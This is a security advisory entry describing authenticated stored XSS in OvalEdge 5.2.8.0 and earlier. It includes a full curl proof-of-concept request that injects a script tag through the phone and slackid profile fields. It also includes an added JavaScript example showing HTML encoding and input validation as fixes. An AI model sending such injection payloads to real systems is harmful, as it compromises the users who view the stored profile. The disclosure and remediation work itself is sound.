Stored XSS (authenticated)
OvalEdge 5.2.8.0 and earlier is affected by multiple Stored XSS (also known as Persistent or Type II XSS) vulnerabilities through the slackid or phone parameters of a POST request to /profile/updateProfile. Authentication is required.
curl -k 'https://example.com/ovaledge/profile/updateProfile' \
-H 'Accept: */*' \
-H 'Accept-Language: en-US,en;q=0.9' \
-H 'Connection: keep-alive' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykZH2TqJk3RBgZVKN' \
-H 'Cookie: oe-loc=en; JSESSIONID=NzA2ZTg2YjUtYmE2OS00MTZiLTllZmItNTIzZGUxZmRmYjUy' \
-H 'Origin: https://example.com' \
-H 'Referer: https://example.com/ovaledge/' \
-H 'Sec-Fetch-Dest: empty' \
-H 'Sec-Fetch-Mode: cors' \
-H 'Sec-Fetch-Site: same-origin' \
-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "macOS"' \
--data-raw $'------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="fname"\r\n\r\nAdmin\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="lname"\r\n\r\nOvalEdge\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="email"\r\n\r\[email protected] \r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="phone"\r\n\r\n </span> <script > alert ('xss');</script >\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="slackid"\r\n\r\n </span> <script > alert ('xss');</script >\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="picture"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="stackId"\r\n\r\n\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="userId"\r\n\r\nadmin\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN--\r\n' \
--compressed
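The payload above leads with a closing </span>, which suggests the stored phone and slackid values are written into a span without output encoding. The following is an added example, not code from OvalEdge or from this advisory, that contrasts that unsafe rendering with HTML-context encoding and an assumed server-side allowlist for the phone field; the payload string is copied from the request above as constructed test input.

```javascript
// Added example (not OvalEdge code): contextual HTML encoding for profile
// fields such as phone and slackid before they are placed inside a <span>.
// PAYLOAD is the value from the advisory's request, embedded here as test input.
const PAYLOAD = " </span> <script > alert ('xss');</script >";

// Encode the characters that carry meaning in an HTML text/attribute context.
function htmlEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering: raw concatenation lets the stored "</span>" close the
// element, so the following <script> tag becomes live markup in the page.
function renderProfileUnsafe(profile) {
  return `<span class="phone">${profile.phone}</span>` +
         `<span class="slack">${profile.slackid}</span>`;
}

// Hardened rendering: every untrusted value is encoded for the HTML context,
// so the same payload is displayed as text and cannot break out of the span.
function renderProfileSafe(profile) {
  return `<span class="phone">${htmlEncode(profile.phone)}</span>` +
         `<span class="slack">${htmlEncode(profile.slackid)}</span>`;
}

// Defence in depth: server-side allowlist validation of the phone field.
// The pattern is an assumption for this example; a deployment would use its own.
const PHONE_RE = /^\+?[0-9][0-9 ()-]{4,19}$/;
function isValidPhone(value) {
  return PHONE_RE.test(String(value));
}

// Check used by the tests below: does rendered HTML still contain a live script tag?
function containsScriptTag(html) {
  return /<\s*script\b/i.test(html);
}
```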